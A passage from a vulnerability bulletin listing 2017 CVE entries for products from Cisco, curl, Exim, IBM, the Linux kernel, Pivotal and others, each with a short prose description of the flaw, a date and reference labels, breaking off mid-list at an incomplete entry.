 		A vulnerability in the CLI of Cisco NX-OS System Software could allow an authenticated, local attacker to read the contents of arbitrary files. The vulnerability is due to insufficient input validation for a specific CLI command. An attacker could exploit this vulnerability by issuing a crafted command on the CLI. An exploit could allow the attacker unauthorized access to read arbitrary files on the underlying local file system. On products that support multiple virtual device contexts (VDCs), this vulnerability could allow an attacker to read files from any VDC. This vulnerability affects the following products running Cisco NX-OS System Software: Multilayer Director Switches, Nexus 2000 Series Fabric Extenders, Nexus 3000 Series Switches, Nexus 5000 Series Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Nexus 9000 Series Fabric Switches in Application Centric Infrastructure (ACI) mode, Nexus 9000 Series Switches in standalone NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules, Unified Computing System Manager. Cisco Bug IDs: CSCve51707, CSCve93961, CSCve93964, CSCve93965, CSCve93968, CSCve93974, CSCve93976.2017-11-30not yet calculatedCVE-2017-12338
SECTRACK
CONFIRM
cisco -- prime_service_catalog
 		A SQL Injection vulnerability in the web framework of Cisco Prime Service Catalog could allow an unauthenticated, remote attacker to execute unauthorized Structured Query Language (SQL) queries. The vulnerability is due to a failure to validate user-supplied input that is used in SQL queries. An attacker could exploit this vulnerability by sending a crafted SQL statement to an affected system. Successful exploitation could allow the attacker to read entries in some database tables. Cisco Bug IDs: CSCvg30333.2017-11-30not yet calculatedCVE-2017-12364
BID
SECTRACK
CONFIRM
cisco -- secure_access_control_system
 		A vulnerability in the web-based interface of Cisco Secure Access Control System (ACS) could allow an unauthenticated, remote attacker to view sensitive information on an affected system. The vulnerability exists because the affected software does not sufficiently protect system software version information when the software responds to HTTP requests that are sent to the web-based interface of the software. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based interface of the affected software. A successful exploit could allow the attacker to view sensitive information about the software, which the attacker could use to conduct additional reconnaissance attacks. Cisco Bug IDs: CSCvf66155.2017-11-30not yet calculatedCVE-2017-12354
BID
SECTRACK
CONFIRM
cisco -- ucs_central_software
 		Multiple vulnerabilities in the web-based management interface of Cisco UCS Central Software could allow a remote attacker to conduct a cross-site scripting (XSS) attack against a user of the affected interface or hijack a valid session ID from a user of the affected interface. Cisco Bug IDs: CSCvf71978, CSCvf71986.2017-11-30not yet calculatedCVE-2017-12349
BID
SECTRACK
CONFIRM
cisco -- ucs_central_software
 		Multiple vulnerabilities in the web-based management interface of Cisco UCS Central Software could allow a remote attacker to conduct a cross-site scripting (XSS) attack against a user of the affected interface or hijack a valid session ID from a user of the affected interface. Cisco Bug IDs: CSCvf71978, CSCvf71986.2017-11-30not yet calculatedCVE-2017-12348
BID
SECTRACK
CONFIRM
cisco -- umbrella_virtual_appliance
 		The Cisco Umbrella Virtual Appliance Version 2.0.3 and prior contained an undocumented encrypted remote support tunnel (SSH) which auto initiated from the customer's appliance to Cisco's SSH Hubs in the Umbrella datacenters. These tunnels were primarily leveraged for remote support and allowed for authorized/authenticated personnel from the Cisco Umbrella team to access the appliance remotely and obtain full control without explicit customer approval. To address this vulnerability, the Umbrella Virtual Appliance version 2.1.0 now requires explicit customer approval before an SSH tunnel from the VA to the Cisco terminating server can be established.2017-12-01not yet calculatedCVE-2017-6679
BID
MISC
MISC
cisco -- unified_communications_manager
 		A vulnerability in the web-based management interface of Cisco Unified Communications Manager could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive browser-based information. Cisco Bug IDs: CSCvf79346.2017-11-30not yet calculatedCVE-2017-12357
BID
SECTRACK
CONFIRM
cisco -- webex_network_recording_player
 		A "Cisco WebEx Network Recording Player Denial of Service Vulnerability" exists in Cisco WebEx Network Recording Player for Advanced Recording Format (ARF) and WebEx Recording Format (WRF) files. A remote attacker could exploit this by providing a user with a malicious ARF or WRF file via email or URL and convincing the user to launch the file. Exploitation of this could cause an affected player to crash and, in some cases, could allow arbitrary code execution on the system of a targeted user. Cisco Bug IDs: CSCve11545, CSCve02843, CSCve11548.2017-11-30not yet calculatedCVE-2017-12367
BID
SECTRACK
CONFIRM
cisco -- webex_network_recording_player
 		A "Cisco WebEx Network Recording Player Remote Code Execution Vulnerability" exists in Cisco WebEx Network Recording Player for Advanced Recording Format (ARF) and WebEx Recording Format (WRF) files. A remote attacker could exploit this by providing a user with a malicious ARF or WRF file via email or URL and convincing the user to launch the file. Exploitation of this could cause an affected player to crash and, in some cases, could allow arbitrary code execution on the system of a targeted user. Cisco Bug IDs: CSCve10584, CSCve10591, CSCve11503, CSCve10658, CSCve11507, CSCve10749, CSCve10744, CSCve11532, CSCve10762, CSCve10764, CSCve11538.2017-11-30not yet calculatedCVE-2017-12368
BID
SECTRACK
CONFIRM
cisco -- webex_network_recording_player
 		A "Cisco WebEx Network Recording Player Out-of-Bounds Vulnerability" exists in Cisco WebEx Network Recording Player for Advanced Recording Format (ARF) and WebEx Recording Format (WRF) files. A remote attacker could exploit this by providing a user with a malicious ARF or WRF file via email or URL and convincing the user to launch the file. Exploitation of this could cause an affected player to crash and, in some cases, could allow arbitrary code execution on the system of a targeted user. Cisco Bug IDs: CSCve30208, CSCve30214, CSCve30268.2017-11-30not yet calculatedCVE-2017-12369
BID
SECTRACK
CONFIRM
cisco -- webex_network_recording_player
 		A "Cisco WebEx Network Recording Player Remote Code Execution Vulnerability" exists in Cisco WebEx Network Recording Player for Advanced Recording Format (ARF) and WebEx Recording Format (WRF) files. A remote attacker could exploit this by providing a user with a malicious ARF or WRF file via email or URL and convincing the user to launch the file. Exploitation of this could cause an affected player to crash and, in some cases, could allow arbitrary code execution on the system of a targeted user. Cisco Bug IDs: CSCvf38060, CSCvg54836, CSCvf38077, CSCvg54843, CSCvf38084, CSCvg54850.2017-11-30not yet calculatedCVE-2017-12370
BID
SECTRACK
CONFIRM
cisco -- webex_network_recording_player
 		A "Cisco WebEx Network Recording Player Remote Code Execution Vulnerability" exists in Cisco WebEx Network Recording Player for Advanced Recording Format (ARF) and WebEx Recording Format (WRF) files. A remote attacker could exploit this by providing a user with a malicious ARF or WRF file via email or URL and convincing the user to launch the file. Exploitation of this could cause an affected player to crash and, in some cases, could allow arbitrary code execution on the system of a targeted user. Cisco Bug IDs: CSCvf49650, CSCvg54853, CSCvg54856, CSCvf49697, CSCvg54861, CSCvf49707, CSCvg54867.2017-11-30not yet calculatedCVE-2017-12371
BID
SECTRACK
CONFIRM
cisco -- webex_network_recording_player
 		A "Cisco WebEx Network Recording Player Remote Code Execution Vulnerability" exists in Cisco WebEx Network Recording Player for Advanced Recording Format (ARF) and WebEx Recording Format (WRF) files. A remote attacker could exploit this by providing a user with a malicious ARF or WRF file via email or URL and convincing the user to launch the file. Exploitation of this could cause an affected player to crash and, in some cases, could allow arbitrary code execution on the system of a targeted user. Cisco Bug IDs: CSCvf57234, CSCvg54868, CSCvg54870.2017-11-30not yet calculatedCVE-2017-12372
BID
SECTRACK
CONFIRM
cs-cart -- cs-cart
 		The files function in the administration section in CS-Cart 4.6.2 and earlier allows attackers to execute arbitrary PHP code via vectors involving a custom page.2017-11-28not yet calculatedCVE-2017-15673
MISC
curl_project -- curl_and_libcurlThe FTP wildcard function in curl and libcurl before 7.57.0 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) or possibly have unspecified other impact via a string that ends with an '[' character.2017-11-29not yet calculatedCVE-2017-8817
SECTRACK
CONFIRM
DEBIAN
curl_project -- curl_and_libcurl
 		The NTLM authentication feature in curl and libcurl before 7.57.0 on 32-bit platforms allows attackers to cause a denial of service (integer overflow and resultant buffer overflow, and application crash) or possibly have unspecified other impact via vectors involving long user and password fields.2017-11-29not yet calculatedCVE-2017-8816
BID
SECTRACK
CONFIRM
DEBIAN
curl_project -- curl_and_libcurl
 		curl and libcurl before 7.57.0 on 32-bit platforms allow attackers to cause a denial of service (out-of-bounds access and application crash) or possibly have unspecified other impact because too little memory is allocated for interfacing to an SSL library.2017-11-29not yet calculatedCVE-2017-8818
BID
SECTRACK
CONFIRM
d-link -- dir-605l_model_b
 		An issue was discovered on D-Link DIR-605L Model B before FW2.11betaB06_hbrf devices, related to the code that handles the authentication values for HNAP. An attacker can cause a denial of service (device crash) or possibly have unspecified other impact by sending a sufficiently long string in the password field of the HTTP Basic Authentication section of the HTTP request.2017-11-30not yet calculatedCVE-2017-17065
CONFIRM
dahua_technology -- ip_camera_and_ptz
 		Customer of Dahua IP camera or IP PTZ could submit relevant device information to receive a time limited temporary password from Dahua authorized dealer to reset the admin password. The algorithm used in this mechanism is potentially at risk of being compromised and subsequently utilized by attacker.2017-11-28not yet calculatedCVE-2017-9315
CONFIRM
dahua_technology -- ipc-hdw4300s
 		Firmware upgrade authentication bypass vulnerability was found in Dahua IPC-HDW4300S and some IP products. The vulnerability was caused by internal Debug function. This particular function was used for problem analysis and performance tuning during product development phase. It allowed the device to receive only specific data (one direction, no transmit) and therefore it was not involved in any instance of collecting user privacy data or allowing remote code execution.2017-11-27not yet calculatedCVE-2017-9316
CONFIRM
dell_emc -- scaleio
 		An issue was discovered in EMC ScaleIO 2.0.1.x. A vulnerability in message parsers (MDM, SDS, and LIA) could potentially allow an unauthenticated remote attacker to send specifically crafted packets to stop ScaleIO services and cause a denial of service situation.2017-11-28not yet calculatedCVE-2017-8019
CONFIRM
BID
dell_emc -- scaleio
 		An issue was discovered in EMC ScaleIO 2.0.1.x. A buffer overflow vulnerability in the SDBG service may potentially allow a remote unauthenticated attacker to execute arbitrary commands with root privileges on an affected server.2017-11-28not yet calculatedCVE-2017-8020
CONFIRM
BID
dell_emc -- scaleio
 		An issue was discovered in EMC ScaleIO 2.0.1.x. In a Linux environment, one of the support scripts saves the credentials of the ScaleIO MDM user who executed the script in clear text in temporary log files. The temporary files may potentially be read by an unprivileged user with access to the server where the script was executed to recover exposed credentials.2017-11-28not yet calculatedCVE-2017-8001
CONFIRM
BID
digium -- asterisk_open_source
 		An issue was discovered in chan_skinny.c in Asterisk Open Source 13.18.2 and older, 14.7.2 and older, and 15.1.2 and older, and Certified Asterisk 13.13-cert7 and older. If the chan_skinny (aka SCCP protocol) channel driver is flooded with certain requests, it can cause the asterisk process to use excessive amounts of virtual memory, eventually causing asterisk to stop processing requests of any kind.2017-12-01not yet calculatedCVE-2017-17090
CONFIRM
CONFIRM
east_nippon_telegraph_and_telephone_corporation -- pwr_q200_router
 		PWR-Q200 does not use random values for source ports of DNS query packets, which allows remote attackers to conduct DNS cache poisoning attacks.2017-12-01not yet calculatedCVE-2017-10874
CONFIRM
JVN
emc -- rsa_authentication_agent
 		EMC RSA Authentication Agent for Web: Apache Web Server version 8.0 and RSA Authentication Agent for Web: Apache Web Server version 8.0.1 prior to Build 618 have a security vulnerability that could potentially lead to authentication bypass.2017-11-29not yet calculatedCVE-2017-14377
CONFIRM
BID
SECTRACK
emc -- rsa_authentication_agent
 		EMC RSA Authentication Agent API 8.5 for C and RSA Authentication Agent SDK 8.6 for C allow attackers to bypass authentication, aka an "Error Handling Vulnerability."2017-11-29not yet calculatedCVE-2017-14378
CONFIRM
BID
SECTRACK
emc -- rsa_authentication_manager
 		EMC RSA Authentication Manager before 8.2 SP1 P6 has a cross-site scripting vulnerability that could potentially be exploited by malicious users to compromise the affected system.2017-11-28not yet calculatedCVE-2017-14379
CONFIRM
BID
SECTRACK
evince -- evince
 		Command injection in evince 3.24.8 via filename when printing to PDF2017-11-27not yet calculatedCVE-2017-1000159
CONFIRM
exim -- exim
 		The receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free) via vectors involving BDAT commands.2017-11-25not yet calculatedCVE-2017-16943
MISC
MISC
MISC
SECTRACK
MISC
MISC
MISC
MISC
MISC
DEBIAN
exim -- exim
 		The receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to cause a denial of service (infinite loop and stack exhaustion) via vectors involving BDAT commands and an improper check for a '.' character signifying the end of the content, related to the bdat_getc function.2017-11-25not yet calculatedCVE-2017-16944
MISC
MISC
MISC
SECTRACK
MISC
MISC
DEBIAN
EXPLOIT-DB
ffmpeg -- ffmpeg
 		The gmc_mmx function in libavcodec/x86/mpegvideodsp.c in FFmpeg 3.4 does not properly validate widths and heights, which allows remote attackers to cause a denial of service (integer signedness error and out-of-array read) via a crafted MPEG file.2017-11-30not yet calculatedCVE-2017-17081
MISC
MISC
MISC
foreman -- foreman
 		An attacker submitting facts to the Foreman server containing HTML can cause a stored XSS on certain pages: (1) Facts page, when clicking on the "chart" button and hovering over the chart; (2) Trends page, when checking the graph for a trend based on a such fact; (3) Statistics page, for facts that are aggregated on this page.2017-11-27not yet calculatedCVE-2017-15100
CONFIRM
CONFIRM
fortinet -- fortios
 		A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 5.6.0 to 5.6.2, 5.4.0 to 5.4.6, 5.2.0 to 5.2.12, 5.0 and below versions under SSL VPN web portal allows an authenticated user to inject arbitrary web script or HTML in the context of the victim's browser via the login redir parameter. An URL Redirection attack may also be feasible by injecting an external URL via the affected parameter.2017-11-29not yet calculatedCVE-2017-14186
BID
SECTRACK
CONFIRM
fortinet -- fortiwebmanager
 		An improper access control vulnerability in Fortinet FortiWebManager 5.8.0 allows anyone that can access the admin webUI to successfully log-in regardless the provided password.2017-11-29not yet calculatedCVE-2017-14189
BID
SECTRACK
CONFIRM
gnu -- bitutils
 		elf.c in the Binary File Descriptor (BFD) library (aka libbfd), as distributed in GNU Binutils 2.29.1, does not validate sizes of core notes, which allows remote attackers to cause a denial of service (bfd_getl32 heap-based buffer over-read and application crash) via a crafted object file, related to elfcore_grok_netbsd_procinfo, elfcore_grok_openbsd_procinfo, and elfcore_grok_nto_status.2017-11-30not yet calculatedCVE-2017-17080
MISC
hangzhou_hikvision_digital_technology -- hikvision
 		HikVision Wi-Fi IP cameras, when used in a wired configuration, allow physically proximate attackers to trigger association with an arbitrary access point by leveraging a default SSID with no WiFi encryption or authentication.2017-12-01not yet calculatedCVE-2017-14953
MISC
FULLDISC
hitachi_vantara -- pentaho
 		In Hitachi Vantara Pentaho BA Platform through 8.0, a CSRF issue exists in the Business Analytics application.2017-11-27not yet calculatedCVE-2016-10701
MISC
MISC
MISC
ibm -- business_process_manager
 		IBM Business Process Manager 8.6.0.0 allows authenticated users to stop and resume the Event Manager by calling a REST API with incorrect authorization checks.2017-11-27not yet calculatedCVE-2017-1628
CONFIRM
BID
SECTRACK
MISC
ibm -- collaborative_lifecycle_management
 		An undisclosed vulnerability in CLM applications may result in some administrative deployment parameters being shown to an attacker. IBM X-Force ID: 124631.2017-11-27not yet calculatedCVE-2017-1251
CONFIRM
MISC
ibm -- doors_next_generation
 		IBM DOORS Next Generation (DNG/RRC) 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 134064.2017-11-27not yet calculatedCVE-2017-1689
CONFIRM
BID
MISC
ibm -- doors_next_generation
 		IBM DOORS Next Generation (DNG/RRC) 4.0, 5.0, and 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 131759.2017-11-27not yet calculatedCVE-2017-1560
CONFIRM
BID
MISC
ibm -- doors_next_generation
 		IBM DOORS Next Generation (DNG/RRC) 4.0, 5.0, and 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 128460.2017-11-27not yet calculatedCVE-2017-1461
CONFIRM
BID
MISC
ibm -- doors_next_generation
 		IBM DOORS Next Generation (DNG/RRC) 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 134063.2017-11-27not yet calculatedCVE-2017-1688
CONFIRM
BID
MISC
ibm -- doors_next_generation
 		IBM DOORS Next Generation (DNG/RRC) 4.0, 5.0, and 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 134000.2017-11-27not yet calculatedCVE-2017-1678
CONFIRM
BID
MISC
ibm -- doors_next_generation
 		IBM DOORS Next Generation (DNG/RRC) 4.0, 5.0, and 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 132494.2017-11-27not yet calculatedCVE-2017-1593
CONFIRM
BID
MISC
ibm -- doors_next_generation
 		IBM DOORS Next Generation (DNG/RRC) 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 132927.2017-11-27not yet calculatedCVE-2017-1607
CONFIRM
BID
MISC
ibm -- doors_next_generation
 		IBM DOORS Next Generation (DNG/RRC) 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 133260.2017-11-27not yet calculatedCVE-2017-1650
CONFIRM
BID
MISC
ibm -- jazz_foundation
 		IBM Jazz Foundation products could allow an authenticated user to obtain sensitive information from stack traces. IBM X-Force ID: 131852.2017-11-27not yet calculatedCVE-2017-1570
CONFIRM
MISC
ibm -- jazz_products
 		IBM Jazz technology based products might divulge information that might be useful in helping attackers through error messages. IBM X-Force ID: 116868.2017-11-27not yet calculatedCVE-2016-6024
CONFIRM
MISC
ibm -- rhapsody_dm
 		IBM Rhapsody DM products could reveal sensitive information in HTTP 500 Internal Server Error responses. IBM X-Force ID: 124359.2017-11-27not yet calculatedCVE-2017-1240
CONFIRM
BID
MISC
ibm -- websphere_mq
 		IBM WebSphere MQ 8.0 and 9.0 could allow an authenticated user to cause a shared memory leak by MQ applications using dynamic queues, which can lead to lack of resources for other MQ applications. IBM X-Force ID: 125144.2017-11-27not yet calculatedCVE-2017-1283
CONFIRM
MISC
ibm -- websphere
 		IBM WebSphere Commerce Enterprise, Professional, Express, and Developer 7.0 and 8.0 could allow an authenticated attacker to obtain information such as user personal data. IBM X-Force ID: 128622.2017-11-27not yet calculatedCVE-2017-1484
CONFIRM
BID
MISC
indeo -- otter
 		Inedo Otter before 1.7.4 has directory traversal in filesystem-based rafts via vectors involving '/' characters or initial '.' characters, aka OT-181.2017-12-01not yet calculatedCVE-2017-15607
CONFIRM
CONFIRM
indeo -- otter
 		Indeo Otter through 1.7.4 mishandles a "</script>" substring in an initial DP payload, which allows remote attackers to cause a denial of service (crash) or possibly have unspecified other impact, as demonstrated by the Plan Editor.2017-12-01not yet calculatedCVE-2017-17086
CONFIRM
ismartalarm -- cubeone

 		Password file exposure in firmware in iSmartAlarm CubeOne version 2.2.4.8 and earlier allows attackers to execute arbitrary commands with administrative privileges by retrieving credentials from this file.2017-12-01not yet calculatedCVE-2017-13664
MISC
ismartalarm -- cubeone
 		Encryption key exposure in firmware in iSmartAlarm CubeOne version 2.2.4.8 and earlier allows attackers to decrypt log files via an exposed key.2017-12-01not yet calculatedCVE-2017-13663
MISC
javascript -- javascriptmath.js before 3.17.0 had an arbitrary code execution in the JavaScript engine. Creating a typed function with JavaScript code in the name could result arbitrary execution.2017-11-27not yet calculatedCVE-2017-1001002
CONFIRM
CONFIRM

javascript -- javascript

math.js before 3.17.0 had an issue where private properties such as a constructor could be replaced by using unicode characters when creating an object.2017-11-27not yet calculatedCVE-2017-1001003
CONFIRM
CONFIRM
javascript -- javascript
 		typed-function before 0.10.6 had an arbitrary code execution in the JavaScript engine. Creating a typed function with JavaScript code in the name could result arbitrary execution.2017-11-27not yet calculatedCVE-2017-1001004
CONFIRM
CONFIRM
kmplayer -- kmplayer
 		KMPlayer 4.2.2.4 allows remote attackers to cause a denial of service via a crafted NSV file.2017-11-28not yet calculatedCVE-2017-16952
EXPLOIT-DB
lenovo -- xclarity_administrator
 		A vulnerability was identified in Lenovo XClarity Administrator (LXCA) before 1.4.0 where LXCA user account names may be exposed to unauthenticated users with access to the LXCA web user interface. No password information of the user accounts is exposed.2017-11-30not yet calculatedCVE-2017-3764
CONFIRM
libsndfile -- libsndfile
 		In libsndfile 1.0.25 (fixed in 1.0.26), a divide-by-zero error exists in the function wav_w64_read_fmt_chunk() in wav_w64.c, which may lead to DoS when playing a crafted audio file.2017-11-25not yet calculatedCVE-2017-16942
MISC
libtiff -- libtiff
 		tools/pal2rgb.c in pal2rgb in LibTIFF 4.0.9 allows remote attackers to cause a denial of service (TIFFSetupStrips heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted TIFF file.2017-12-02not yet calculatedCVE-2017-17095
MISC
MISC
libvirtd -- libvirtd
 		When libvirtd is configured by OSP director (tripleo-heat-templates) to use the TLS transport it defaults to the same certificate authority as all non-libvirtd services. As no additional authentication is configured this allows these services to connect to libvirtd (which is equivalent to root access). If a vulnerability exists in another service it could, combined with this flaw, be exploited to escalate privileges to gain control over compute nodes.2017-11-27not yet calculatedCVE-2017-15114
BID
CONFIRM
libxcursor -- libxcursor
 		libXcursor before 1.1.15 has various integer overflows that could lead to heap buffer overflows when processing malicious cursors, e.g., with programs like GIMP.2017-12-01not yet calculatedCVE-2017-16612
MLIST
UBUNTU
CONFIRM
CONFIRM
MLIST
libxfont_libxfont2 -- libxfont_libxfont2
 		In libXfont before 1.5.4 and libXfont2 before 2.0.3, a local attacker can open (but not read) files on the system as root, triggering tape rewinds, watchdogs, or similar mechanisms that can be triggered by opening files.2017-12-01not yet calculatedCVE-2017-16611
MLIST
UBUNTU
CONFIRM
MLIST
MLIST
linux -- linux_kernel
 		The Linux Kernel versions 2.6.38 through 4.14 have a problematic use of pmd_mkdirty() in the touch_pmd() function inside the THP implementation. touch_pmd() can be reached by get_user_pages(). In such case, the pmd will become dirty. This scenario breaks the new can_follow_write_pmd()'s logic - pmd can become dirty without going through a COW cycle. This bug is not as severe as the original "Dirty cow" because an ext4 file (or any other regular file) cannot be mapped using THP. Nevertheless, it does allow us to overwrite read-only huge pages. For example, the zero huge page and sealed shmem files can be overwritten (since their mapping can be populated using THP). Note that after the first write page-fault to the zero page, it will be replaced with a new fresh (and zeroed) thp.2017-11-30not yet calculatedCVE-2017-1000405
MISC
EXPLOIT-DB
linux -- linux_kernel
 		The rngapi_reset function in crypto/rng.c in the Linux kernel before 4.2 allows attackers to cause a denial of service (NULL pointer dereference).2017-11-30not yet calculatedCVE-2017-15116
MISC
MISC
MISC
MISC
linux -- linux_kernel
 		The mm_init function in kernel/fork.c in the Linux kernel before 4.12.10 does not clear the ->exe_file member of a new process's mm_struct, allowing a local attacker to achieve a use-after-free or possibly have unspecified other impact by running a specially crafted program.2017-11-28not yet calculatedCVE-2017-17052
CONFIRM
BID
CONFIRM
CONFIRM
linux -- linux_kernel
 		The init_new_context function in arch/x86/include/asm/mmu_context.h in the Linux kernel before 4.12.10 does not correctly handle errors from LDT table allocation when forking a new process, allowing a local attacker to achieve a use-after-free or possibly have unspecified other impact by running a specially crafted program. This vulnerability only affected kernels built with CONFIG_MODIFY_LDT_SYSCALL=y.2017-11-28not yet calculatedCVE-2017-17053
CONFIRM
BID
CONFIRM
CONFIRM
linux -- linux_kernel
 		The XFRM dump policy implementation in net/xfrm/xfrm_user.c in the Linux kernel before 4.13.11 allows local users to gain privileges or cause a denial of service (use-after-free) via a crafted SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink messages.2017-11-24not yet calculatedCVE-2017-16939
MISC
MISC
MISC
BID
MISC
MISC
MISC
linux -- linux_kernel
 		The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14.2 mishandles holes in hugetlb ranges, which allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call.2017-11-27not yet calculatedCVE-2017-16994
CONFIRM
CONFIRM
BID
CONFIRM
CONFIRM
EXPLOIT-DB
misp -- misp
 		The admin_edit function in app/Controller/UsersController.php in MISP 2.4.82 mishandles the enable_password field, which allows admins to discover a hashed password by reading the audit log.2017-11-25not yet calculatedCVE-2017-16946
CONFIRM
moore_thompson -- mt_cloud
 		SQL injection vulnerability in the A-Reserve and A-Reserve for MT cloud versions 3.8.6 and earlier allows an attacker to execute arbitrary SQL commands via unspecified vectors.2017-12-01not yet calculatedCVE-2017-10899
JVN
moore_thompson -- mt_cloud
 		SQL injection vulnerability in the A-Member and A-Member for MT cloud versions 3.8.6 and earlier allows an attacker to execute arbitrary SQL commands via unspecified vectors.2017-12-01not yet calculatedCVE-2017-10898
JVN
opendaylight_project -- karaf
 		OpenDaylight Karaf 0.6.1-Carbon fails to clear the cache after a password change, allowing the old password to be used until the Karaf cache is manually cleared (e.g. via restart).2017-11-30not yet calculatedCVE-2017-1000406
MLIST
CONFIRM
CONFIRM
pebble -- smartwatch
 		Pebble Smartwatch devices through 4.3 mishandle UUID storage, which allows attackers to read an arbitrary application's flash storage, and access an arbitrary application's JavaScript instance, by modifying a UUID value within the header of a crafted application binary.2017-11-28not yet calculatedCVE-2016-10702
MISC
pivotal -- cloud_foundry
 		In Pivotal Single Sign-On for PCF (1.3.x versions prior to 1.3.4 and 1.4.x versions prior to 1.4.3), certain pages allow code to be injected into the DOM environment through query parameters, leading to XSS attacks.2017-11-27not yet calculatedCVE-2017-8044
BID
CONFIRM
pivotal -- cloud_foundry
 		An issue was discovered in Cloud Foundry Foundation capi-release (all versions prior to 1.45.0), cf-release (all versions prior to v280), and cf-deployment (all versions prior to v1.0.0). The Cloud Controller does not prevent space developers from creating subdomains to an already existing route that belongs to a different user in a different org and space, aka an "Application Subdomain Takeover."2017-11-28not yet calculatedCVE-2017-14389
CONFIRM
pivotal -- cloud_foundry

 		In Cloud Foundry Foundation cf-deployment v0.35.0, a misconfiguration with Loggregator and syslog-drain causes logs to be drained to unintended locations.2017-11-27not yet calculatedCVE-2017-14390
BID
CONFIRM
pivotal -- cloud_foundry
 		In Cloud Foundry Foundation Credhub-release version 1.1.0, access control lists (ACLs) enforce whether an authenticated user can perform an operation on a credential. For installations using ACLs, the ACL was bypassed for the CredHub interpolate endpoint, allowing authenticated applications to view any credential within the CredHub installation.2017-11-27not yet calculatedCVE-2017-8038
CONFIRM
pivotal -- cloud_foundry
 		An issue was discovered in Cloud Foundry Foundation cf-release (all versions prior to v279) and UAA (30.x versions prior to 30.6, 45.x versions prior to 45.4, 52.x versions prior to 52.1). In some cases, the UAA allows an authenticated user for a particular client to revoke client tokens for other users on the same client. This occurs only if the client is using opaque tokens or JWT tokens validated using the check_token endpoint. A malicious actor could cause denial of service.2017-11-27not yet calculatedCVE-2017-8031
BID
CONFIRM
pivotal -- spring-LDAP
 		In Pivotal Spring-LDAP versions 1.3.0 - 2.3.1, when connected to some LDAP servers, when no additional attributes are bound, and when using LDAP BindAuthenticator with org.springframework.ldap.core.support.DefaultTlsDirContextAuthenticationStrategy as the authentication strategy, and setting userSearch, authentication is allowed with an arbitrary password when the username is correct. This occurs because some LDAP vendors require an explicit operation for the LDAP bind to take effect.2017-11-27not yet calculatedCVE-2017-8028
CONFIRM
DEBIAN
pivotal -- spring_security
 		An issue was discovered in Pivotal Spring Security 4.2.0.RELEASE through 4.2.2.RELEASE, and Spring Security 5.0.0.M1. When configured to enable default typing, Jackson contained a deserialization vulnerability that could lead to arbitrary code execution. Jackson fixed this vulnerability by blacklisting known "deserialization gadgets." Spring Security configures Jackson with global default typing enabled, which means that (through the previous exploit) arbitrary code could be executed if all of the following is true: (1) Spring Security's Jackson support is being leveraged by invoking SecurityJackson2Modules.getModules(ClassLoader) or SecurityJackson2Modules.enableDefaultTyping(ObjectMapper); (2) Jackson is used to deserialize data that is not trusted (Spring Security does not perform deserialization using Jackson, so this is an explicit choice of the user); and (3) there is an unknown (Jackson is not blacklisting it already) "deserialization gadget" that allows code execution present on the classpath. Jackson provides a blacklisting approach to protecting against this type of attack, but Spring Security should be proactive against blocking unknown "deserialization gadgets" when Spring Security enables default typing.2017-11-27not yet calculatedCVE-2017-4995
BID
CONFIRM
pivotal -- spring
 		An issue was discovered in Pivotal Spring Web Flow through 2.4.5. Applications that do not change the value of the MvcViewFactoryCreator useSpringBinding property which is disabled by default (i.e., set to 'false') can be vulnerable to malicious EL expressions in view states that process form submissions but do not have a sub-element to declare explicit data binding property mappings. NOTE: this issue exists because of an incomplete fix for CVE-2017-4971.2017-11-27not yet calculatedCVE-2017-8039
BID
CONFIRM
pivotal -- spring
 		In Pivotal Spring AMQP versions prior to 1.7.4, 1.6.11, and 1.5.7, an org.springframework.amqp.core.Message may be unsafely deserialized when being converted into a string. A malicious payload could be crafted to exploit this and enable a remote code execution attack.2017-11-27not yet calculatedCVE-2017-8045
BID
CONFIRM
piwigo -- piwigo
 		The application Piwigo is affected by an SQL injection vulnerability in version 2.9.2 and possibly prior. This vulnerability allows remote authenticated attackers to obtain information in the context of the user used by the application to retrieve data from the database. tags.php is affected: values of the edit_list parameters are not sanitized; these are used to construct an SQL query and retrieve a list of registered users into the application.2017-12-01not yet calculatedCVE-2017-16893
MISC
princeton -- ptw-wms1
